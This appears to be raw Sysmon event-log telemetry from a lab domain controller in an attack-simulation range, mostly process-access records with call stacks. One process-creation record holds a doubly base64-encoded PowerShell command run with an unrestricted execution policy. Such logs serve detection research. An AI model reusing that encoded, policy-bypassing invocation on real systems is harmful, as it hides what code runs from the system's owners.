15:50:22.825{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000334Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.825{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000333Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.825{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000332Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.825{D28789B6-7AC1-5FA1-0500-000000008701}636652C:\Windows\system32\csrss.exe{D28789B6-7C3E-5FA1-0303-000000008701}5016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000331Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.825{D28789B6-7C3E-5FA1-0203-000000008701}26084712C:\Windows\system32\cmd.exe{D28789B6-7C3E-5FA1-0303-000000008701}5016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000330Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.836{D28789B6-7C3E-5FA1-0303-000000008701}5016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C3E-5FA1-38EB-100000000000}0x10eb380HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7C3E-5FA1-0203-000000008701}2608C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x8000000000000000329Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.825{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000328Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.825{D28789B6-7C3E-5FA1-0103-000000008701}49881680C:\Windows\system32\conhost.exe{D28789B6-7C3E-5FA1-0203-000000008701}2608C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000327Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.825{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000326Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.825{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000325Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.825{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000324Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.825{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000323Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.825{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000322Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.825{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000321Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.825{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000320Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.825{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000319Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.825{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000318Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.825{D28789B6-7AC1-5FA1-0500-000000008701}636652C:\Windows\system32\csrss.exe{D28789B6-7C3E-5FA1-0203-000000008701}2608C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000317Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 